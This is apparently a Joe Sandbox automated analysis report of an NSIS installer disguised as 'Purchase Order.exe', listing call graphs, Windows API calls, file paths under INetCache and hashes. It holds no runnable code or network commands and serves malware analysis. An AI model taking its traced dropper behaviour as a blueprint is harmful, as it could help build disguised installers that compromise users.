5635 401f4c 5633->5635 5636 405e55 wsprintfA 5633->5636 5636->5635 4489 401932 4490 401934 4489->4490 4491 402ace 18 API calls 4490->4491 4492 401939 4491->4492 4495 405799 4492->4495 4532 405a57 4495->4532 4498 4057c1 DeleteFileA 4504 401942 4498->4504 4499 4057d8 4511 405906 4499->4511 4546 405ef7 lstrcpynA 4499->4546 4501 4057fe 4502 405811 4501->4502 4503 405804 lstrcatA 4501->4503 4547 4059b0 lstrlenA 4502->4547 4505 405817 4503->4505 4508 405825 lstrcatA 4505->4508 4510 405830 lstrlenA FindFirstFileA 4505->4510 4507 4061fb 2 API calls 4509 40592a 4507->4509 4508->4510 4509->4504 4512 405969 3 API calls 4509->4512 4510->4511 4530 405854 4510->4530 4511->4504 4511->4507 4514 405934 4512->4514 4513 405994 CharNextA 4513->4530 4515 405751 5 API calls 4514->4515 4516 405940 4515->4516 4517 405944 4516->4517 4518 40595a 4516->4518 4517->4504 4522 405110 25 API calls 4517->4522 4520 405110 25 API calls 4518->4520 4520->4504 4521 4058e5 FindNextFileA 4523 4058fd FindClose 4521->4523 4521->4530 4524 405951 4522->4524 4523->4511 4525 405db2 38 API calls 4524->4525 4525->4504 4527 405799 62 API calls 4527->4530 4528 405110 25 API calls 4528->4521 4529 405110 25 API calls 4529->4530 4530->4513 4530->4521 4530->4527 4530->4528 4530->4529 4531 405db2 38 API calls 4530->4531 4551 405ef7 lstrcpynA 4530->4551 4552 405751 4530->4552 4531->4530 4560 405ef7 lstrcpynA 4532->4560 4534 405a68 4561 405a02 CharNextA CharNextA 4534->4561 4537 4057b9 4537->4498 4537->4499 4538 406162 5 API calls 4544 405a7e 4538->4544 4539 405aa9 lstrlenA 4540 405ab4 4539->4540 4539->4544 4542 405969 3 API calls 4540->4542 4541 4061fb 2 API calls 4541->4544 4543 405ab9 GetFileAttributesA 4542->4543 4543->4537 4544->4537 4544->4539 4544->4541 4545 4059b0 2 API calls 4544->4545 4545->4539 4546->4501 4548 4059bd 4547->4548 4549 4059c2 CharPrevA 4548->4549 4550 4059ce 4548->4550 4549->4548 4549->4550 4550->4505 4551->4530 4553 405b45 2 API calls 4552->4553 4555 40575d 4553->4555 4554 40577e 4554->4530 4555->4554 4556 405774 DeleteFileA 4555->4556 4557 40576c RemoveDirectoryA 4555->4557 4558 40577a 4556->4558 4557->4558 4558->4554 4559 40578a SetFileAttributesA 4558->4559 4559->4554 4560->4534 4562 405a1d 4561->4562 4565 405a2d 4561->4565 4564 405a28 CharNextA 4562->4564 4562->4565 4563 405a4d 4563->4537 4563->4538 4564->4563 4565->4563 4566 405994 CharNextA 4565->4566 4566->4565 4567 401eb3 4568 402ace 18 API calls 4567->4568 4569 401eb9 4568->4569 4570 405110 25 API calls 4569->4570 4571 401ec3 4570->4571 4582 405688 CreateProcessA 4571->4582 4573 401f1f CloseHandle 4577 402729 4573->4577 4574 401ee8 WaitForSingleObject 4575 401ec9 4574->4575 4576 401ef6 GetExitCodeProcess 4574->4576 4575->4573 4575->4574 4575->4577 4578 4062cc 2 API calls 4575->4578 4579 401f11 4576->4579 4580 401f08 4576->4580 4578->4574 4579->4573 4585 405e55 wsprintfA 4580->4585 4583 4056c7 4582->4583 4584 4056bb CloseHandle 4582->4584 4583->4575 4584->4583 4585->4579 5637 403835 5638 403840 5637->5638 5639 403847 GlobalAlloc 5638->5639 5640 403844 5638->5640 5639->5640 5641 406c35 5644 4063c6 5641->5644 5642 406450 GlobalAlloc 5642->5644 5645 406d31 5642->5645 5643 406447 GlobalFree 5643->5642 5644->5642 5644->5643 5644->5644 5644->5645 5646 4064c7 GlobalAlloc 5644->5646 5647 4064be GlobalFree 5644->5647 5646->5644 5646->5645 5647->5646 4596 402336 4597 402ace 18 API calls 4596->4597 4598 402347 4597->4598 4599 402ace 18 API calls 4598->4599 4600 402350 4599->4600 4601 402ace 18 API calls 4600->4601 4602 40235a GetPrivateProfileStringA 4601->4602 5648 4014b7 5649 4014bd 5648->5649 5650 401389 2 API calls 5649->5650 5651 4014c5 5650->5651 5652 401b39 5653 402ace 18 API calls 5652->5653 5654 401b40 5653->5654 5655 402aac 18 API calls 5654->5655 5656 401b49 wsprintfA 5655->5656 5657 40295e 5656->5657 5658 402939 SendMessageA 5659 402953 InvalidateRect 5658->5659 5660 40295e 5658->5660 5659->5660 4635 4015bb 4636 402ace 18 API calls 4635->4636 4637 4015c2 4636->4637 4638 405a02 4 API calls 4637->4638 4648 4015ca 4638->4648 4639 401624 4641 401652 4639->4641 4642 401629 4639->4642 4640 405994 CharNextA 4640->4648 4645 401423 25 API calls 4641->4645 4643 401423 25 API calls 4642->4643 4644 401630 4643->4644 4662 405ef7 lstrcpynA 4644->4662 4652 40164a 4645->4652 4648->4639 4648->4640 4651 40160c GetFileAttributesA 4648->4651 4654 405670 4648->4654 4657 4055d6 CreateDirectoryA 4648->4657 4663 405653 CreateDirectoryA 4648->4663 4650 40163b SetCurrentDirectoryA 4650->4652 4651->4648 4655 406290 5 API calls 4654->4655 4656 405677 4655->4656 4656->4648 4658 405623 4657->4658 4659 405627 GetLastError 4657->4659 4658->4648 4659->4658 4660 405636 SetFileSecurityA 4659->4660 4660->4658 4661 40564c GetLastError 4660->4661 4661->4658 4662->4650 4664 405663 4663->4664 4665 405667 GetLastError 4663->4665 4664->4648 4665->4664 5661 4016bb 5662 402ace 18 API calls 5661->5662 5663 4016c1 GetFullPathNameA 5662->5663 5666 4016d8 5663->5666 5670 4016f9 5663->5670 5664 40170d GetShortPathNameA 5665 40295e 5664->5665 5667 4061fb 2 API calls 5666->5667 5666->5670 5668 4016e9 5667->5668 5668->5670 5671 405ef7 lstrcpynA 5668->5671 5670->5664 5670->5665 5671->5670 5672 401d3b GetDlgItem GetClientRect 5673 402ace 18 API calls 5672->5673 5674 401d6b LoadImageA SendMessageA 5673->5674 5675 401d89 DeleteObject 5674->5675 5676 40295e 5674->5676 5675->5676 4844 4032bf SetErrorMode GetVersion 4845 4032f6 4844->4845 4846 4032fc 4844->4846 4847 406290 5 API calls 4845->4847 4848 406222 3 API calls 4846->4848 4847->4846 4849 403312 lstrlenA 4848->4849 4849->4846 4850 403321 4849->4850 4851 406290 5 API calls 4850->4851 4852 403329 4851->4852 4853 406290 5 API calls 4852->4853 4854 403330 #17 OleInitialize SHGetFileInfoA 4853->4854 4932 405ef7 lstrcpynA 4854->4932 4856 40336d GetCommandLineA 4933 405ef7 lstrcpynA 4856->4933 4858 40337f GetModuleHandleA 4859 403396 4858->4859 4860 405994 CharNextA 4859->4860 4861 4033aa CharNextA 4860->4861 4870 4033ba 4861->4870 4862 403484 4863 403497 GetTempPathA 4862->4863 4934 40328e 4863->4934 4865 4034af 4867 4034b3 GetWindowsDirectoryA lstrcatA 4865->4867 4868 403509 DeleteFileA 4865->4868 4866 405994 CharNextA 4866->4870 4871 40328e 12 API calls 4867->4871 4944 402d4a GetTickCount GetModuleFileNameA 4868->4944 4870->4862 4870->4866 4873 403486 4870->4873 4872 4034cf 4871->4872 4872->4868 4875 4034d3 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4872->4875 5030 405ef7 lstrcpynA 4873->5030 4874 40351d 4876 4035b3 4874->4876 4879 4035a3 4874->4879 4883 405994 CharNextA 4874->4883 4878 40328e 12 API calls 4875->4878 5033 403785 4876->5033 4881 403501 4878->4881 4974 403877 4879->4974 4881->4868 4881->4876 4885 403538 4883->4885 4894 4035e3 4885->4894 4895 40357e 4885->4895 4886 4036eb 4888 4036f3 GetCurrentProcess OpenProcessToken 4886->4888 4889 40376d ExitProcess 4886->4889 4887 4035cd 4890 4056ed MessageBoxIndirectA 4887->4890 4891 40373e 4888->4891 4892 40370e LookupPrivilegeValueA AdjustTokenPrivileges 4888->4892 4896 4035db ExitProcess 4890->4896 4899 406290 5 API calls 4891->4899 4892->4891 4898 405670 5 API calls 4894->4898 4897 405a57 18 API calls 4895->4897 4900 403589 4897->4900 4901 4035e8 lstrcatA 4898->4901 4902 403745 4899->4902 4900->4876 5031 405ef7 lstrcpynA 4900->5031 4903 403604 lstrcatA lstrcmpiA 4901->4903 4904 4035f9 lstrcatA 4901->4904 4905 40375a ExitWindowsEx 4902->4905 4908 403766 4902->4908 4903->4876 4907 403620 4903->4907 4904->4903 4905->4889 4905->4908 4910 403625 4907->4910 4911 40362c 4907->4911 4912 40140b 2 API calls 4908->4912 4909 403598 5032 405ef7 lstrcpynA 4909->5032 4914 4055d6 4 API calls 4910->4914 4915 405653 2 API calls 4911->4915 4912->4889 4916 40362a 4914->4916 4917 403631 SetCurrentDirectoryA 4915->4917 4916->4917 4918 403640 4917->4918 4919 40364b 4917->4919 5042 405ef7 lstrcpynA 4918->5042 5043 405ef7 lstrcpynA 4919->5043 4922 405f19 18 API calls 4923 40368a DeleteFileA 4922->4923 4924 403697 CopyFileA 4923->4924 4929 403659 4923->4929 4924->4929 4925 4036df 4927 405db2 38 API calls 4925->4927 4926 405db2 38 API calls 4926->4929 4927->4876 4928 405f19 18 API calls 4928->4929 4929->4922 4929->4925 4929->4926 4929->4928 4930 405688 2 API calls 4929->4930 4931 4036cb CloseHandle 4929->4931 4930->4929 4931->4929 4932->4856 4933->4858 4935 406162 5 API calls 4934->4935 4937 40329a 4935->4937 4936 4032a4 4936->4865 4937->4936 4938 405969 3 API calls 4937->4938 4939 4032ac 4938->4939 4940 405653 2 API calls 4939->4940 4941 4032b2 4940->4941 4942 405b99 2 API calls 4941->4942 4943 4032bd 4942->4943 4943->4865 5044 405b6a GetFileAttributesA CreateFileA 4944->5044 4946 402d8d 4973 402d9a 4946->4973 5045 405ef7 lstrcpynA 4946->5045 4948 402db0 4949 4059b0 2 API calls 4948->4949 4950 402db6 4949->4950 5046 405ef7 lstrcpynA 4950->5046 4952 402dc1 GetFileSize 4953 402ec2 4952->4953 4971 402dd8 4952->4971 4954 402cab 33 API calls 4953->4954 4955 402ec9 4954->4955 4957 402f05 GlobalAlloc 4955->4957 4955->4973 5048 403277 SetFilePointer 4955->5048 4956 403261 ReadFile 4956->4971 4961 402f1c 4957->4961 4958 402f5d 4959 402cab 33 API calls 4958->4959 4959->4973 4965 405b99 2 API calls 4961->4965 4962 402ee6 4963 403261 ReadFile 4962->4963 4966 402ef1 4963->4966 4964 402cab 33 API calls 4964->4971 4967 402f2d CreateFileA 4965->4967 4966->4957 4966->4973 4968 402f67 4967->4968 4967->4973 5047 403277 SetFilePointer 4968->5047 4970 402f75 4972 402ff0 45 API calls 4970->4972 4971->4953 4971->4956 4971->4958 4971->4964 4971->4973 4972->4973 4973->4874 4975 406290 5 API calls 4974->4975 4976 40388b 4975->4976 4977 403891 4976->4977 4978 4038a3 4976->4978 5058 405e55 wsprintfA 4977->5058 4979 405dde 3 API calls 4978->4979 4980 4038ce 4979->4980 4982 4038ec lstrcatA 4980->4982 4984 405dde 3 API calls 4980->4984 4983 4038a1 4982->4983 5049 403b3c 4983->5049 4984->4982 4987 405a57 18 API calls 4988 40391e 4987->4988 4989 4039a7 4988->4989 4991 405dde 3 API calls 4988->4991 4990 405a57 18 API calls 4989->4990 4992 4039ad 4990->4992 4993 40394a 4991->4993 4994 4039bd LoadImageA 4992->4994 4995 405f19 18 API calls 4992->4995 4993->4989 4999 403966 lstrlenA 4993->4999 5003 405994 CharNextA 4993->5003 4996 403a63 4994->4996 4997 4039e4 RegisterClassA 4994->4997 4995->4994 4998 40140b 2 API calls 4996->4998 5000 403a6d 4997->5000 5001 403a1a SystemParametersInfoA CreateWindowExA 4997->5001 5002 403a69 4998->5002 5004 403974 lstrcmpiA 4999->5004 5005 40399a 4999->5005 5000->4876 5001->4996 5002->5000 5010 403b3c 19 API calls 5002->5010 5008 403964 5003->5008 5004->5005 5006 403984 GetFileAttributesA 5004->5006 5007 405969 3 API calls 5005->5007 5009 403990 5006->5009 5011 4039a0 5007->5011 5008->4999 5009->5005 5012 4059b0 2 API calls 5009->5012 5013 403a7a 5010->5013 5059 405ef7 lstrcpynA 5011->5059 5012->5005 5015 403a86 ShowWindow 5013->5015 5016 403b09 5013->5016 5018 406222 3 API calls 5015->5018 5017 4051e2 5 API calls 5016->5017 5019 403b0f 5017->5019 5020 403a9e 5018->5020 5021 403b13 5019->5021 5022 403b2b 5019->5022 5023 403aac GetClassInfoA 5020->5023 5025 406222 3 API calls 5020->5025 5021->5000 5028 40140b 2 API calls 5021->5028 5024 40140b 2 API calls 5022->5024 5026 403ac0 GetClassInfoA RegisterClassA 5023->5026 5027 403ad6 DialogBoxParamA 5023->5027 5024->5000 5025->5023 5026->5027 5029 40140b 2 API calls 5027->5029 5028->5000 5029->5000 5030->4863 5031->4909 5032->4879 5034 4037a0 5033->5034 5035 403796 CloseHandle 5033->5035 5036 4037b4 5034->5036 5037 4037aa CloseHandle 5034->5037 5035->5034 5061 4037e2 5036->5061 5037->5036 5040 405799 69 API calls 5041 4035bc OleUninitialize 5040->5041 5041->4886 5041->4887 5042->4919 5043->4929 5044->4946 5045->4948 5046->4952 5047->4970 5048->4962 5050 403b50 5049->5050 5060 405e55 wsprintfA 5050->5060 5052 403bc1 5053 405f19 18 API calls 5052->5053 5054 403bcd SetWindowTextA 5053->5054 5055 4038fc 5054->5055 5056 403be9 5054->5056 5055->4987 5056->5055 5057 405f19 18 API calls 5056->5057 5057->5056 5058->4983 5059->4989 5060->5052 5062 4037f0 5061->5062 5063 4037b9 5062->5063 5064 4037f5 FreeLibrary GlobalFree 5062->5064 5063->5040 5064->5063 5064->5064

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 4032bf-4032f4 SetErrorMode GetVersion 1 4032f6-4032fe call 406290 0->1 2 403307 0->2 1->2 7 403300 1->7 4 40330c-40331f call 406222 lstrlenA 2->4 9 403321-403394 call 406290 * 2 #17 OleInitialize SHGetFileInfoA call 405ef7 GetCommandLineA call 405ef7 GetModuleHandleA 4->9 7->2 18 4033a0-4033b5 call 405994 CharNextA 9->18 19 403396-40339b 9->19 22 40347a-40347e 18->22 19->18 23 403484 22->23 24 4033ba-4033bd 22->24 27 403497-4034b1 GetTempPathA call 40328e 23->27 25 4033c5-4033cd 24->25 26 4033bf-4033c3 24->26 28 4033d5-4033d8 25->28 29 4033cf-4033d0 25->29 26->25 26->26 37 4034b3-4034d1 GetWindowsDirectoryA lstrcatA call 40328e 27->37 38 403509-403523 DeleteFileA call 402d4a 27->38 31 40346a-403477 call 405994 28->31 32 4033de-4033e2 28->32 29->28 31->22 50 403479 31->50 35 4033e4-4033ea 32->35 36 4033fa-403427 32->36 41 4033f0 35->41 42 4033ec-4033ee 35->42 43 403429-40342f 36->43 44 40343a-403468 36->44 37->38 52 4034d3-403503 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 40328e 37->52 53 4035b7-4035c7 call 403785 OleUninitialize 38->53 54 403529-40352f 38->54 41->36 42->36 42->41 46 403431-403433 43->46 47 403435 43->47 44->31 49 403486-403492 call 405ef7 44->49 46->44 46->47 47->44 49->27 50->22 52->38 52->53 66 4036eb-4036f1 53->66 67 4035cd-4035dd call 4056ed ExitProcess 53->67 57 403531-40353c call 405994 54->57 58 4035a7-4035ae call 403877 54->58 70 403572-40357c 57->70 71 40353e-403567 57->71 64 4035b3 58->64 64->53 68 4036f3-40370c GetCurrentProcess OpenProcessToken 66->68 69 40376d-403775 66->69 73 40373e-40374c call 406290 68->73 74 40370e-403738 LookupPrivilegeValueA AdjustTokenPrivileges 68->74 76 403777 69->76 77 40377b-40377f ExitProcess 69->77 78 4035e3-4035f7 call 405670 lstrcatA 70->78 79 40357e-40358b call 405a57 70->79 75 403569-40356b 71->75 91 40375a-403764 ExitWindowsEx 73->91 92 40374e-403758 73->92 74->73 75->70 84 40356d-403570 75->84 76->77 89 403604-40361e lstrcatA lstrcmpiA 78->89 90 4035f9-4035ff lstrcatA 78->90 79->53 88 40358d-4035a3 call 405ef7 * 2 79->88 84->70 84->75 88->58 89->53 94 403620-403623 89->94 90->89 91->69 95 403766-403768 call 40140b 91->95 92->91 92->95 97 403625-40362a call 4055d6 94->97 98 40362c call 405653 94->98 95->69 106 403631-40363e SetCurrentDirectoryA 97->106 98->106 107 403640-403646 call 405ef7 106->107 108 40364b-403673 call 405ef7 106->108 107->108 112 403679-403695 call 405f19 DeleteFileA 108->112 115 4036d6-4036dd 112->115 116 403697-4036a7 CopyFileA 112->116 115->112 118 4036df-4036e6 call 405db2 115->118 116->115 117 4036a9-4036c9 call 405db2 call 405f19 call 405688 116->117 117->115 127 4036cb-4036d2 CloseHandle 117->127 118->53 127->115
                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE ref: 004032E4
                                                                                                  • GetVersion.KERNEL32 ref: 004032EA
                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403313
                                                                                                  • #17.COMCTL32(00000007,00000009), ref: 00403335
                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040333C
                                                                                                  • SHGetFileInfoA.SHELL32(0041ECF0,00000000,?,00000160,00000000), ref: 00403358
                                                                                                  • GetCommandLineA.KERNEL32(00422F20,NSIS Error), ref: 0040336D
                                                                                                  • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\Purchase Order.exe",00000000), ref: 00403380
                                                                                                  • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Purchase Order.exe",00000020), ref: 004033AB
                                                                                                  • GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004034A8
                                                                                                  • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034B9
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034C5
                                                                                                  • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034D9
                                                                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034E1
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004034F2
                                                                                                  • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004034FA
                                                                                                  • DeleteFileA.KERNELBASE(1033), ref: 0040350E
                                                                                                    • Part of subcall function 00406290: GetModuleHandleA.KERNEL32(?,?,?,00403329,00000009), ref: 004062A2
                                                                                                    • Part of subcall function 00406290: GetProcAddress.KERNEL32(00000000,?), ref: 004062BD
                                                                                                  • OleUninitialize.OLE32(?), ref: 004035BC
                                                                                                  • ExitProcess.KERNEL32 ref: 004035DD
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004036FA
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403701
                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403719
                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403738
                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040375C
                                                                                                  • ExitProcess.KERNEL32 ref: 0040377F
                                                                                                    • Part of subcall function 004056ED: MessageBoxIndirectA.USER32(00409230), ref: 00405748
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                                                                  • String ID: "$"C:\Users\user\Desktop\Purchase Order.exe"$.tmp$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\professionalizing$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Purchase Order.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                  • API String ID: 3329125770-3675847306
                                                                                                  • Opcode ID: e89bfe13b8eb1ba36e43d38e3c68fc4bfbdc91619f963e3beaaf1f3555cbe72f
                                                                                                  • Instruction ID: 987bc29005933e48b9d04248005189ae3273ffe916fb5a61461eda946c2e522c
                                                                                                  • Opcode Fuzzy Hash: e89bfe13b8eb1ba36e43d38e3c68fc4bfbdc91619f963e3beaaf1f3555cbe72f
                                                                                                  • Instruction Fuzzy Hash: FCC109706082816AE7216F259D49A2F3EACEF81706F44447FF481761E2CB7C9A05CB6E

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 128 40524e-40526a 129 405270-405337 GetDlgItem * 3 call 404111 call 4049ae GetClientRect GetSystemMetrics SendMessageA * 2 128->129 130 4053f9-4053ff 128->130 150 405355-405358 129->150 151 405339-405353 SendMessageA * 2 129->151 132 405401-405423 GetDlgItem CreateThread CloseHandle 130->132 133 405429-405435 130->133 132->133 135 405457-40545d 133->135 136 405437-40543d 133->136 140 4054b2-4054b5 135->140 141 40545f-405465 135->141 138 405478-40547f call 404143 136->138 139 40543f-405452 ShowWindow * 2 call 404111 136->139 154 405484-405488 138->154 139->135 140->138 143 4054b7-4054bd 140->143 145 405467-405473 call 4040b5 141->145 146 40548b-40549b ShowWindow 141->146 143->138 152 4054bf-4054d2 SendMessageA 143->152 145->138 148 4054ab-4054ad call 4040b5 146->148 149 40549d-4054a6 call 405110 146->149 148->140 149->148 157 405368-40537f call 4040dc 150->157 158 40535a-405366 SendMessageA 150->158 151->150 159 4054d8-405504 CreatePopupMenu call 405f19 AppendMenuA 152->159 160 4055cf-4055d1 152->160 167 405381-405395 ShowWindow 157->167 168 4053b5-4053d6 GetDlgItem SendMessageA 157->168 158->157 165 405506-405516 GetWindowRect 159->165 166 405519-40552f TrackPopupMenu 159->166 160->154 165->166 166->160 170 405535-40554f 166->170 171 4053a4 167->171 172 405397-4053a2 ShowWindow 167->172 168->160 169 4053dc-4053f4 SendMessageA * 2 168->169 169->160 173 405554-40556f SendMessageA 170->173 174 4053aa-4053b0 call 404111 171->174 172->174 173->173 175 405571-405591 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 173->175 174->168 177 405593-4055b3 SendMessageA 175->177 177->177 178 4055b5-4055c9 GlobalUnlock SetClipboardData CloseClipboard 177->178 178->160
                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 004052AD
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004052BC
                                                                                                  • GetClientRect.USER32(?,?), ref: 004052F9
                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00405300
                                                                                                  • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405321
                                                                                                  • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405332
                                                                                                  • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405345
                                                                                                  • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405353
                                                                                                  • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405366
                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405388
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040539C
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004053BD
                                                                                                  • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004053CD
                                                                                                  • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004053E6
                                                                                                  • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004053F2
                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 004052CB
                                                                                                    • Part of subcall function 00404111: SendMessageA.USER32(00000028,?,00000001,00403F42), ref: 0040411F
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040540E
                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_000051E2,00000000), ref: 0040541C
                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405423
                                                                                                  • ShowWindow.USER32(00000000), ref: 00405446
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040544D
                                                                                                  • ShowWindow.USER32(00000008), ref: 00405493
                                                                                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004054C7
                                                                                                  • CreatePopupMenu.USER32 ref: 004054D8
                                                                                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004054ED
                                                                                                  • GetWindowRect.USER32(?,000000FF), ref: 0040550D
                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405526
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405562
                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405572
                                                                                                  • EmptyClipboard.USER32 ref: 00405578
                                                                                                  • GlobalAlloc.KERNEL32(00000042,?), ref: 00405581
                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0040558B
                                                                                                  • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040559F
                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004055B8
                                                                                                  • SetClipboardData.USER32(00000001,00000000), ref: 004055C3
                                                                                                  • CloseClipboard.USER32 ref: 004055C9
                                                                                                  Strings
                                                                                                  • Nonbeneficial Setup: Installing, xrefs: 0040553E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.2754646281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.2754632794.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754667148.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754681917.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.2754754068.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_Purchase Order.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                  • String ID: Nonbeneficial Setup: Installing
                                                                                                  • API String ID: 590372296-485038270
                                                                                                  • Opcode ID: bd05f583e1d858ca64e0ebc0ccb0213cdf64d916f2755f86f6f3f2ff8d205a57
                                                                                                  • Instruction ID: e0dc4773203ce2f112709eab9a11bfc184f4d069c8d5349c47d5b80479340f4b
                                                                                                  • Opcode Fuzzy Hash: bd05f583e1d858ca64e0ebc0ccb0213cdf64d916f2755f86f6f3f2ff8d205a57
                                                                                                  • Instruction Fuzzy Hash: 10A148B1900208BFDF119F60DD89AAE7BB9FB48355F00407AFA01B61A0C7B55E51DF69

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
